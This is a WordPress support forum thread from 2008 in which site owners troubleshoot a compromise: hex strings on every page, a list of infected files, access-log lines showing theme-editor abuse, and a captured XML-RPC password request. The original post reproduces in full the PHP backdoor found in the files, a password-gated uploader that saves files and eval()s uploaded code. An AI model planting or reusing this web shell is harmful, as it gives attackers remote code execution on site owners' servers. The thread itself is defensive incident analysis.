Theme-editing exploit?

  • My WordPress installation has been exploited before by the various XML-RPC edits, but I believe I’d cleaned up everything. Today I noticed 3 distinctive hex strings at the top of every page. WordPress is otherwise fully functional.

    c1608e58b7a40647381b4667630bf061
82d58bfc8dc7a2fa985939b01d5b694f
69175bee376c12eba6ddbd1f632a7f10

    Google results find others a victim of the same exploit. Overwriting all files with another installation does not change this, suggesting it involves a theme not overwritten. I use a modified Hemingway.

    The following files are compromised:

    fixed_wp-blog-header.php
wp-admin/includes/fixed_schema.php
wp-admin/import/fixed_rss.php
wp-admin/fixed_edit-form-advanced.php
wp-content/fixed_wp-cache-config.php
wp-content/plugins/wp-super-cache/plugins/fixed_searchengine.php
wp-content/plugins/wp-super-cache/fixed_wp-cache-base.php
wp-content/plugins/geourl/fixed_geourl.php
wp-content/plugins/ald-meebome/fixed_admin.inc.php
wp-content/plugins/akismet/fixed_akismet.php
wp-content/plugins/fixed_hello.php
wp-content/themes/default/images/fixed_header-img.php
wp-content/themes/default/fixed_header.php
wp-content/themes/hemingway/blocks/fixed_related_posts.php
wp-content/themes/classic/fixed_header.php
wp-content/themes/quentin/fixed_header.php
wp-includes/js/fixed_wp-ajax-js.php
wp-includes/js/tinymce/plugins/spellchecker/includes/fixed_general.php
wp-includes/js/tinymce/plugins/spellchecker/fixed_config.php
wp-includes/js/tinymce/plugins/spellchecker/classes/utils/fixed_Logger.php
wp-includes/js/tinymce/plugins/spellchecker/classes/fixed_TinyPspellShell.class.php
wp-includes/js/tinymce/langs/fixed_wp-langs.php
wp-includes/js/tinymce/fixed_tiny_mce_config.php
wp-includes/fixed_pluggable-functions.php
wp-stats.php

    The exploit was apparently triggered by the following visit which occurred after I had installed 2.5:

    web.moea.unam.mx - - [14/Apr/2008:14:45:52 -0600] "POST /wp-login.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
mostro.politicas.unam.mx - - [14/Apr/2008:14:45:55 -0600] "GET /wp-admin/theme-editor.php HTTP/1.0" 200 19961 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
mostro.politicas.unam.mx - - [14/Apr/2008:14:45:59 -0600] "GET /wp-admin/theme-editor.php?file=wp-content/themes/hemingway/index.php&theme=Hemingway HTTP/1.0" 200 9922 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
web.moea.unam.mx - - [14/Apr/2008:14:46:03 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
web.moea.unam.mx - - [14/Apr/2008:14:46:07 -0600] "POST / HTTP/1.0" 200 12570 "-" "Opera/9.01 (Windows NT 5.0; U; en)"
web.moea.unam.mx - - [14/Apr/2008:14:46:11 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"
mostro.politicas.unam.mx - - [14/Apr/2008:14:46:14 -0600] "GET /wp-login.php?action=logout HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)"

    It’s entirely possible I’ve had these files for some time and they were implanted by an earlier exploit, but did not express themselves until a new perhaps theme-editing exploit reactivated them. I’m not familiar at all with WordPress’s workings or its security.

    I believe all of the files contain the same code, buffered with many blank lines before and after. The “PASSWD” may be different in different files:

    <?php
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;

define('PASSWD','92c06d9c2c240ddd01f7cb449db72103');

function say($t) {
  echo "$t\n";
};

function testdata($t) {
  say(md5("mark_$t"));
};

echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
  if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["s"]["size"])) {
      if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
      {
      testdata('save_ok');
      };
      //eval($code);
  } else {
    testdata('save_fail');
  };

  if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["f"]["size"]))
  {
      eval($code);
      testdata('ok');
  } else {
    testdata('fail');
  };

} else {
  testdata('pass');
};

testdata('end');
echo "</pre>";
?>
Viewing 11 replies - 1 through 11 (of 11 total)

  • once again, what you pasted is not the hack.. its simply the file access. I stress this because its nearly identical to another post here.

    You cannot, once again, you CANNOT, open wp-admin/theme-editor without having the proper credentials.

    If you examine what you pasted, you can see that they logged in.

    Install my plugin that provides logging..if you want to see exactly what is going on

    https://www.village-idiot.org/post-logger/

    Im also going to go out on a limb and say that since Ive seen that exact thing on older installs that were exploited, that your password was compromised some time ago.

    Here’s my bet.

    You install my logging password.

    you change your password.

    within a day, you will see older exploits attempts that worked on the older versions for grabbing your admin password.

    Thread Starter lucent

    (@lucent)

    Thank you. That explanation does seem most likely. I have installed your plugin and changed my password and will watch the log.

    I received an email from Google saying one of my sites (only a wordpress blog) was compromised and that any results for this site would now feature a warning from Google. Long story short, I discovered the exact same code in my blog and removed it. This seems like a definite exploit in wordpress (2.3.3 here).

    I had the same problem. I only found out after I upgraded to 2.5.1 and decided to completely reinstall my blog (except for the database).

    After a little bit more than half a week today I finally got lucky with the post-logger.

    <?xml_version = \"1.0\"?>
<methodCall><methodName>metaWeblog.getRecentPosts</methodName>
	<params>
		<param><value><string>C6CE3FFB3174106584CBB250C0B0519BF4E294</string></value></param>
		<param><value><string>UserName</string></value></param>
		<param><value><string>PassWord</string></value></param>
		<param><value><int>1</int></value></param>
	</params>
</methodCall>
78.90.14.123
/xmlrpc.php
May 11, 2008, 11:20 pm

    There it was my (now invalid) password from some host in Bulgaria.

    Now what should I do with this information?

    youre using my post-logger plugin? ??

    That, btw, should be an old exploit.

    I am SO glad to know that that captures xmlrpc requests.

    Now what should I do with this information?

    Like I said, that should be an old exploit.

    If you want though, you can pass that on to [email protected] and ref. this thread. Rest assured, that if it isnt, Matt will come along and edit this thread.

    And good for you, for not only upgrading but for being proactive, and no doubt, curious enough, to use my plugin to locate the ‘presumed’ entry point. WP needs more warriors.

    whooami, I downloaded your post-logger, but am not sure how to install it.
    When I go to my WordPress admin page, I get this code:
    c1608e58b7a40647381b4667630bf061
    82d58bfc8dc7a2fa985939b01d5b694f
    69175bee376c12eba6ddbd1f632a7f10

    Same thing I’m seeing when I try to go to my blog page.

    I do have ftp access to the server & have Fantastico through my host. If I install a new version of WordPress over my old one, will my posts remain intact?

    sonnata,

    I havent a clue why you are seeing that. But its showing up in google’s cache of your site from May 6.

    https://64.233.167.104/search?q=cache:69PNZCe1jk4J:www.homeproductsnmore.net/+https://www.homeproductsnmore.net/&hl=en&ct=clnk&cd=1&gl=us

    Youre worrying about apples and oranges — apples being those numbers, and oranges being my plugin.

    In other words, theyre not related.

    You need to fix the problem with your blog before installing any plugins.

    If I install a new version of WordPress over my old one, will my posts remain intact?

    If you can follow instructions, of course they will. But, like I just indicated, what you are seeing might be a sign of something that necessitates more than simple upgrade.

    I did not have your plugin installed before this problem occurred. I was hoping it would help me track down the cause of it.

    I have tried upgrading WordPress according to the link you gave me, with both the Three Step Upgrade as well as the more detailed upgrade instructions.

    Neither worked. Still still seeing this code on both /wp-admin/ page as well as https://www.homeproductsnmore.net/

    c1608e58b7a40647381b4667630bf061
    82d58bfc8dc7a2fa985939b01d5b694f
    69175bee376c12eba6ddbd1f632a7f10

    BTW, this is the only thing that appears on either psge.
    I have backed up my database. Would moving it to another host & reinstalling wordpress there fix this?
    I’m at a loss as to what to do at this point.

    Same problem for me today. Files were named co_wp-app.php , co_404.php, etc….
    If I delete xmlrpc.php, what would be the effect on these attacks? Would I be able to use pingback or receive pingback?

    if you remove or rename xmlrpc.php you will not be able to receive pingbacks. I dont know about sending them, though. Trackbacks should still work.

    You should check this too: https://www.bloggerguide.net/blog-platform/wordpress/wordpress-exploit-giving-backlinks-redirects-and-headaches-but-no-visitors/

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘Theme-editing exploit?’ is closed to new replies.

Tags